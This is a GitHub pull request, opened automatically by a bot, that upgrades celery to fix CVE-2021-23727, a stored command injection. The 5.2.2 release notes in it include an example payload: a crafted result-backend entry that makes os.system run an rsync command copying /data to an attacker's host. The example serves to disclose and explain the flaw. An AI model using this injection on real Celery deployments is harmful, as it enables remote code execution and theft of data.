Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update dependency celery to v5 [SECURITY] - abandoned #286

Open
wants to merge 1 commit into
base: master
Choose a base branch
from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Mar 7, 2022

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
celery (source, changelog) ==4.4.5 -> ==5.2.2 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2021-23727

This affects the package celery before 5.2.2. It by default trusts the messages and metadata stored in backends (result stores). When reading task metadata from the backend, the data is deserialized. Given that an attacker can gain access to, or somehow manipulate the metadata within a celery backend, they could trigger a stored command injection vulnerability and potentially gain further access to the system.


Release Notes

celery/celery

v5.2.2

Compare Source

=====

:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz

  • Various documentation fixes.

  • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

    When a task fails, the failure information is serialized in the backend.
    In some cases, the exception class is only importable from the
    consumer's code base. In this case, we reconstruct the exception class
    so that we can re-raise the error on the process which queried the
    task's result. This was introduced in #​4836.
    If the recreated exception type isn't an exception, this is a security issue.
    Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
    os.system("rsync /data [email protected]:~/data")
    by setting the task's result to a failure in the result backend with the os,
    the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

    .. code-block:: python

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
    

    According to my analysis, this vulnerability can only be exploited if
    the producer delayed a task which runs long enough for the
    attacker to change the result mid-flight, and the producer has
    polled for the task's result.
    The attacker would also have to gain access to the result backend.
    The severity of this security vulnerability is low, but we still
    recommend upgrading.

.. _version-5.2.1:

v5.2.1

Compare Source

=====

:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin

  • Fix rstrip usage on bytes instance in ProxyLogger.
  • Pass logfile to ExecStop in celery.service example systemd file.
  • fix: reduce latency of AsyncResult.get under gevent (#​7052)
  • Limit redis version: <4.0.0.
  • Bump min kombu version to 5.2.2.
  • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
  • Remove dependency to case (#​7077).
  • fix: task expiration is timezone aware if needed (#​7065).
  • Initial testing of pypy-3.8 beta to CI.
  • Docs, CI & tests cleanups.

.. _version-5.2.0:

v5.2.0

Compare Source

=====

:release-date: 2021-11-08 7.15 A.M UTC+6:00
:release-by: Asif Saif Uddin

  • Prevent from subscribing to empty channels (#​7040)
  • fix register_task method.
  • Fire task failure signal on final reject (#​6980)
  • Limit pymongo version: <3.12.1 (#​7041)
  • Bump min kombu version to 5.2.1

.. _version-5.2.0rc2:

v5.1.2

Compare Source

Release date: 2021-06-28 16.15 P.M UTC+3:00

Release by: Omer Katz

  • When chords fail, correctly call errbacks. (#​6814)

    We had a special case for calling errbacks when a chord failed
    which assumed they were old style. This change ensures that we
    call the proper errback dispatch method which understands new and
    old style errbacks, and adds test to confirm that things behave as
    one might expect now.

  • Avoid using the Event.isSet() deprecated alias. (#​6824)

  • Reintroduce sys.argv default behaviour for Celery.start(). (#​6825)

v5.1.1

Compare Source

Release date: 2021-06-17 16.10 P.M UTC+3:00

Release by: Omer Katz

  • Fix --pool=threads support in command line options parsing.
    (#​6787)

  • Fix LoggingProxy.write() return type. (#​6791)

  • Couchdb key is now always coerced into a string. (#​6781)

grp is no longer imported unconditionally. (#&#8203;6804)

:   This fixes a regression in 5.1.0 when running Celery in non-unix
    systems.
  • Ensure regen utility class gets marked as done when concertised.
    (#​6789)

  • Preserve call/errbacks of replaced tasks. (#​6770)

  • Use single-lookahead for regen consumption. (#​6799)

  • Revoked tasks are no longer incorrectly marked as retried. (#​6812,
    #​6816)

v5.1.0

Compare Source

Release date: 2021-05-23 19.20 P.M UTC+3:00

Release by: Omer Katz

  • celery -A app events -c camera now works as expected. (#​6774)
  • Bump minimum required Kombu version to 5.1.0.

v5.0.6

Compare Source

v5.0.5

Compare Source

v5.0.4

Compare Source

v5.0.3

Compare Source

v5.0.2

Compare Source

v5.0.1

Compare Source

v5.0.0

Compare Source

v4.4.7

Compare Source

4.4.7

:release-date: 2020-07-31 11.45 P.M UTC+6:00
:release-by: Asif Saif Uddin

  • Add task_received, task_rejected and task_unknown to signals module.
  • [ES backend] add 401 as safe for retry.
  • treat internal errors as failure.
  • Remove redis fanout caveats.
  • FIX: -A and --args should behave the same. (#​6223)
  • Class-based tasks autoretry (#​6233)
  • Preserve order of group results with Redis result backend (#​6218)
  • Replace future with celery.five Fixes #​6250, and reraise to include
  • Fix REMAP_SIGTERM=SIGQUIT not working
  • (Fixes#​6258) MongoDB: fix for serialization issue (#​6259)
  • Make use of ordered sets in Redis opt-in
  • Test, CI, Docker, style and minor doc impovements.

v4.4.6

Compare Source


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.

@renovate renovate bot requested a review from Clivern as a code owner March 7, 2022 13:07
@sonarqubecloud
Copy link

sonarqubecloud bot commented Mar 7, 2022

Kudos, SonarCloud Quality Gate passed!    Quality Gate passed

Bug A 0 Bugs
Vulnerability A 0 Vulnerabilities
Security Hotspot A 0 Security Hotspots
Code Smell A 0 Code Smells

No Coverage information No Coverage information
No Duplication information No Duplication information

@renovate
Copy link
Contributor Author

renovate bot commented Mar 24, 2023

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.

@renovate renovate bot changed the title Update dependency celery to v5 [SECURITY] Update dependency celery to v5 [SECURITY] - abandoned Feb 24, 2024
Copy link
Contributor Author

renovate bot commented Feb 24, 2024

Autoclosing Skipped

This PR has been flagged for autoclosing. However, it is being skipped due to the branch being already modified. Please close/delete it manually or report a bug if you think this is in error.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant